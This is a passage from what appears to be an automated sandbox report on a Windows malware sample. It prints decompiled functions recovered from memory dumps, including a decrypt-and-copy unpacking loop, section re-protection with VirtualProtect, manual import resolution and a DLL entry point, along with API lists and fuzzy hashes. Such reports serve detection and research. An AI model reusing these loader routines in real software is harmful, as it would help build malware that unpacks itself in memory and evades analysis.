				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x2f141b0;
				_t50 = E02F11000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x2f141cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x2f15137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x2f141cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x02f118b4
0x02f118c4
0x02f118cb
0x02f118ce
0x02f118e3
0x02f118ea
0x02f118ef
0x02f11900
0x02f11903
0x02f11909
0x02f1190d
0x02f11910
0x02f119ec
0x02f11916
0x02f11916
0x02f1191a
0x02f119b2
0x02f11920
0x02f11921
0x02f11926
0x02f11929
0x02f1192c
0x02f1192c
0x02f11933
0x02f11936
0x02f1193e
0x02f1193f
0x02f11940
0x02f11947
0x02f1194b
0x02f11951
0x02f11955
0x02f11957
0x02f1195b
0x02f1195e
0x02f11965
0x02f11968
0x02f1196d
0x02f11970
0x02f11986
0x02f11972
0x02f1197c
0x02f1197e
0x02f11981
0x02f11981
0x02f1198d
0x02f1198d
0x02f1198d
0x02f11965
0x02f11998
0x02f1199b
0x02f1199e
0x02f119a7
0x02f119a7
0x02f119af
0x02f119be
0x02f119d3
0x02f119c0
0x02f119c9
0x02f119ce
0x02f119e4
0x02f119e4
0x02f119f3
0x02f119f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 02F11903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 02F119C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 02F119E4

Strings

Jun 6 2021, xrefs: 02F11936

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: f606e340fefbafa3fd459c73fec07ab02603db08deacf8dd71c5a00f2c7b8904
Instruction ID: a59a3cb3ee017cd356bebaadea5b564714e393dd69d28b864c1072d3fe7e96cb
Opcode Fuzzy Hash: f606e340fefbafa3fd459c73fec07ab02603db08deacf8dd71c5a00f2c7b8904
Instruction Fuzzy Hash: 1D417D71E0020E9FDF14CF99C890AEEBBB6BF48354F948129DA1877248D775AA05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F120CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02F120CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E02F11C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x02f120d7
0x02f120dc
0x02f120ea
0x02f120ef
0x02f120ef
0x02f120f5
0x02f120fa
0x02f120fe
0x02f12102
0x02f12102
0x02f1210c
0x02f12115

APIs

GetCurrentThread.KERNEL32 ref: 02F120D1
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 02F120DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 02F120EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 02F12102

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 5805d86cda367c3de8e5b300b46b1f84c53f87d331b9b9c3dba647039425aa2b
Instruction ID: 553e706e2bf3c186fb27ad00b21e3ca2661f96bb5d220b098382a1ae4c8cd9c4
Opcode Fuzzy Hash: 5805d86cda367c3de8e5b300b46b1f84c53f87d331b9b9c3dba647039425aa2b
Instruction Fuzzy Hash: 16E02231B452202BE3122A284C84EABBB8CDF827F87420325FB24E21D0CB508C198AA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F1126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02F1126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x2f141cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x02f11277
0x02f11284
0x02f1128a
0x02f11296
0x02f112a6
0x02f112a8
0x02f112b0
0x02f11345
0x02f1134c
0x00000000
0x00000000
0x00000000
0x02f112b6
0x02f112b6
0x02f112b6
0x02f112ba
0x00000000
0x00000000
0x02f112c6
0x02f112ca
0x02f112ee
0x02f112f2
0x02f11306
0x02f11306
0x02f1130c
0x02f1131b
0x02f1131f
0x02f11327
0x02f11327
0x02f1132f
0x02f11332
0x02f1133f
0x00000000
0x00000000
0x00000000
0x00000000
0x02f1133f
0x02f112fa
0x02f112fe
0x02f11304
0x00000000
0x00000000
0x00000000
0x02f11304
0x02f112d2
0x02f112d6
0x02f112e0
0x02f112d8
0x02f112d8
0x02f112d8
0x00000000
0x02f112d6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 02F112A6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 02F1131B
GetLastError.KERNEL32 ref: 02F11321

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: f0b4aae4dd4a07c87988bc4a328191bb6ccd16c2b1651134374a9889f49e620a
Instruction ID: 8855b6524e252554cd544ea71d86b140a1e64762b1e41b7537e55b7d5caa1fa1
Opcode Fuzzy Hash: f0b4aae4dd4a07c87988bc4a328191bb6ccd16c2b1651134374a9889f49e620a
Instruction Fuzzy Hash: 4B217131D0020AEFCB14CF95C481AABF7F5FF08359F404859D21697984E3B9AAA5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02F114E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E02F114E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x2f141c4);
				_push(1);
				_push( *0x2f141d0 + 0x2f15089);
				 *0x2f141c0 = 0xc;
				 *0x2f141c8 = 0; // executed
				L02F11DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E02F11697( &_v44,  &_v28,  *0x2f141cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x2f141b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E02F11144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x2f141b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E02F12118(_t40, _t30 + 4);
					}
				}
				_t23 = E02F11444(_v44); // executed
				goto L7;
			}

0x02f114fa
0x02f114fb
0x02f11500
0x02f11508
0x02f11509
0x02f11513
0x02f11519
0x02f11522
0x02f11527
0x02f11545
0x02f1159a
0x02f1159b
0x02f1159c
0x02f1159c
0x02f1154d
0x02f11553
0x02f11561
0x02f11565
0x02f1156c
0x02f11574
0x02f11578
0x02f1157a
0x02f11589
0x02f1157c
0x02f11582
0x02f11582
0x02f1157a
0x02f11591
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,02F141C4,00000000), ref: 02F11519
lstrlenW.KERNEL32(?,?,?), ref: 02F1154D

Part of subcall function 02F11144: GetSystemTimeAsFileTime.KERNEL32(?), ref: 02F11151
Part of subcall function 02F11144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02F11167
Part of subcall function 02F11144: _snwprintf.NTDLL ref: 02F1118C
Part of subcall function 02F11144: CreateFileMappingW.KERNELBASE(000000FF,02F141C0,00000004,00000000,?,?), ref: 02F111B1
Part of subcall function 02F11144: GetLastError.KERNEL32 ref: 02F111C8
Part of subcall function 02F11144: CloseHandle.KERNEL32(00000000), ref: 02F111FD

ExitThread.KERNEL32 ref: 02F1159C

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: e1e481a232a526cc4ed2e305d388592803d2fdaebe8ae2dcc1f533a5cd0e8571
Instruction ID: e2634122fdc3e6747438606c66939ff79c76c6e7bfe338c906df3fa6a11e2ff3
Opcode Fuzzy Hash: e1e481a232a526cc4ed2e305d388592803d2fdaebe8ae2dcc1f533a5cd0e8571
Instruction Fuzzy Hash: C7118E72944209AFE711DB65DC44E9BB7ECAB94BC4F820916F709E7140D730E5148B92

Uniqueness

Uniqueness Score: -1.00%

Function 032971A5, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032971A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x329a2d4; // 0x214d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x329ba30; // 0x4f0053
				_v16 = 4;
				_t31 = E03293875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x329a2d4; // 0x214d5a8
					_t5 = _t19 + 0x329ba8c; // 0x6e0049
					_t34 = E03293875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E032950CA(_t34);
					}
					E032950CA(_t31);
				}
				return _v8;
			}

0x032971ab
0x032971b0
0x032971b5
0x032971bc
0x032971c8
0x032971cc
0x032971ce
0x032971d4
0x032971e0
0x032971e4
0x032971f7
0x032971ff
0x03297213
0x0329721b
0x0329721d
0x0329721d
0x03297224
0x03297224
0x0329722b
0x0329722b
0x03297231
0x03297236
0x0329723c

APIs

Part of subcall function 03293875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,032971C8,004F0053,00000000,?), ref: 0329387E
Part of subcall function 03293875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,032971C8,004F0053,00000000,?), ref: 032938A8
Part of subcall function 03293875: memset.NTDLL ref: 032938BC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 032971F7
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 03297213
RegCloseKey.ADVAPI32(00000000), ref: 03297224

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 38657add396f4713a359e3e1f3ea5a4f52733c82a5b0e5b8c512c417692b0937
Instruction ID: d6759f477f8a6bc724e0061be0cd6da4794ce846741c3e54a46ee53714b85bae
Opcode Fuzzy Hash: 38657add396f4713a359e3e1f3ea5a4f52733c82a5b0e5b8c512c417692b0937
Instruction Fuzzy Hash: 43111E76920309BBEF11EBD8EC89FAEB7BCAB44700F154057B601EB141EB74D6549B60

Uniqueness

Uniqueness Score: -1.00%

Function 02F50860, Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02F981A8,00000000,00000001), ref: 02F508B6

Part of subcall function 02F53490: ___crtCorExitProcess.LIBCMTD ref: 02F53497
Part of subcall function 02F53490: ExitProcess.KERNEL32 ref: 02F534A3

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: ExitProcess$AllocateHeap___crt
String ID:
API String ID: 2561786895-0
Opcode ID: 707a590db73185dc307cedc38e1aed94b90678f0f0f4e7a1a570090d660a6d8c
Instruction ID: 39462c350a0d562161f8aaf953bcbfbf4256a0247674739bea5370579a1c6a19
Opcode Fuzzy Hash: 707a590db73185dc307cedc38e1aed94b90678f0f0f4e7a1a570090d660a6d8c
Instruction Fuzzy Hash: 85115E71D4421CEBEB20DFA4E848FA97B74AB043D9F104529FF054A280DB7496D4CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 02F11F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F11F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x2f141cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x02f11f7c
0x02f11f85
0x02f11f8a
0x02f11f90
0x02f11f99
0x02f11f9f
0x02f11fa1
0x02f11fa4
0x02f11fa9
0x02f11fb0
0x02f11fb0
0x02f11fb4
0x02f11fbc
0x02f11fbf
0x00000000
0x00000000
0x02f11fc5
0x02f11fcf
0x02f11fd1
0x02f11fd4
0x02f11fd7
0x02f11fdb
0x02f11fe3
0x02f11fe5
0x02f11fe8
0x02f12050
0x02f12050
0x02f12054
0x00000000
0x00000000
0x02f11fed
0x02f11ff3
0x02f11ff5
0x02f12008
0x02f1200b
0x02f1200b
0x02f1200b
0x02f1200f
0x02f11ff7
0x02f11ff7
0x02f11fff
0x02f12001
0x00000000
0x00000000
0x00000000
0x00000000
0x02f12001
0x02f11fef
0x02f11fef
0x02f12003
0x02f12003
0x02f12003
0x02f12012
0x02f12015
0x02f12017
0x02f1201e
0x02f12019
0x02f12019
0x02f12019
0x02f12026
0x02f1202c
0x02f1202e
0x02f1205e
0x02f12030
0x02f12030
0x02f12033
0x02f12035
0x02f1203d
0x02f1203d
0x02f12042
0x02f12044
0x02f1204b
0x02f1204d
0x02f1204d
0x02f1204d
0x00000000
0x02f1204d
0x00000000
0x02f1202e
0x02f11fdd
0x02f11fdf
0x02f11fe1
0x00000000
0x00000000
0x02f11fe1
0x02f12061
0x02f12061
0x02f12068
0x02f1206d
0x00000000
0x00000000
0x02f12073
0x02f1207e
0x00000000
0x02f1207e
0x02f12075
0x02f12075
0x02f1207b
0x00000000
0x02f1207b
0x02f11fa9
0x02f1207f
0x02f12084

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 02F11FB4
GetProcAddress.KERNEL32(?,00000000), ref: 02F12026

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 3ef0da1a0104b2259ab03fd61dae43b696aba13180b5c19d6f8517bc50f7fac3
Instruction ID: 9c66b99598aed58529af63341985a33e92da4ff465123ea8e509f336550111e3
Opcode Fuzzy Hash: 3ef0da1a0104b2259ab03fd61dae43b696aba13180b5c19d6f8517bc50f7fac3
Instruction Fuzzy Hash: 94310672E0022A9FDB14CF99C884AAEB7F4FF44A84B94416EDE45E7248E771DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03295685, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x329a294) == 0) {
						E03295076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x329a294) == 1) {
						_t10 = E03296B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x0329568c
0x0329568d
0x03295690
0x032956c2
0x032956c4
0x032956c4
0x03295692
0x03295693
0x032956a8
0x032956af
0x032956b1
0x032956b1
0x032956af
0x03295693
0x032956cc

APIs

InterlockedIncrement.KERNEL32(0329A294), ref: 0329569A

Part of subcall function 03296B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 03296B24

InterlockedDecrement.KERNEL32(0329A294), ref: 032956BA

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 6c8f9b16a05a19de1469a48e903089ab40acdcf04486fed670f23d2d4932d2a8
Instruction ID: b976aa4aa1c1eb925c31e676ddf7b637c51d374cf03078e48fea2045e1ce6e42
Opcode Fuzzy Hash: 6c8f9b16a05a19de1469a48e903089ab40acdcf04486fed670f23d2d4932d2a8
Instruction Fuzzy Hash: 52E04F393343235BFF33EB64E908B9EA654AB43B90B29841BA691D5028E651D8D0C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 02F11ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02F11ADB(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E02F11697( &_v8,  &_v12,  *0x2f141cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E02F12087(_t22, _v8,  *0x2f141cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E02F11E8A(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x2f14190, 0, _v8);
				}
				return _t25;
			}

0x02f11adb
0x02f11ade
0x02f11adf
0x02f11af5
0x02f11afe
0x02f11b03
0x02f11b1c
0x02f11b05
0x02f11b18
0x02f11b18
0x02f11b20
0x02f11b2a
0x02f11b32
0x02f11b3a
0x02f11b3c
0x02f11b3c
0x02f11b3a
0x02f11b4c
0x02f11b4c
0x02f11b57

APIs

StrStrIA.KERNELBASE(00000000,02F11CE6,?,02F11CE6,?,00000000,00000000,?,?,?,02F11CE6), ref: 02F11B32
HeapFree.KERNEL32(00000000,?,?,02F11CE6,?,00000000,00000000,?,?,?,02F11CE6), ref: 02F11B4C

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: dfe8ffee5ca34e65b9dab7ef321c554affb8d548490887620a91d77597b4eb4a
Instruction ID: a5e9aaa36a7eda498dd8186c5f4972122c0a66bc7ddff3699db1163bf020995a
Opcode Fuzzy Hash: dfe8ffee5ca34e65b9dab7ef321c554affb8d548490887620a91d77597b4eb4a
Instruction Fuzzy Hash: B8018F76E00118ABDB11DBA5DC00EAFBBADEB847C4F964162AB05F3104E631DA108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F4FDE0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 02F4FDE5

Part of subcall function 02F4FD50: TlsGetValue.KERNEL32(02F83D3C,00000000), ref: 02F4FD63
Part of subcall function 02F4FD50: TlsGetValue.KERNEL32(02F83D3C,02F83D38), ref: 02F4FD84
Part of subcall function 02F4FD50: GetModuleHandleA.KERNEL32(02F7C518), ref: 02F4FD9A
Part of subcall function 02F4FD50: GetProcAddress.KERNEL32(00000000,02F7C508), ref: 02F4FDB2
Part of subcall function 02F4FD50: RtlEncodePointer.NTDLL(?), ref: 02F4FDD3

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: Value$AddressEncodeHandleModulePointerProc__encode_pointer
String ID:
API String ID: 1150849369-0
Opcode ID: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
Instruction ID: 12d886bf4240647cccd05947c3e9b7cec22bb21f2b1bf6a736528cac84aa1272
Opcode Fuzzy Hash: 68a6a37907ab473acd99106e34f8a50d25f70ac82cbaf87fdb11b38c9d560ded
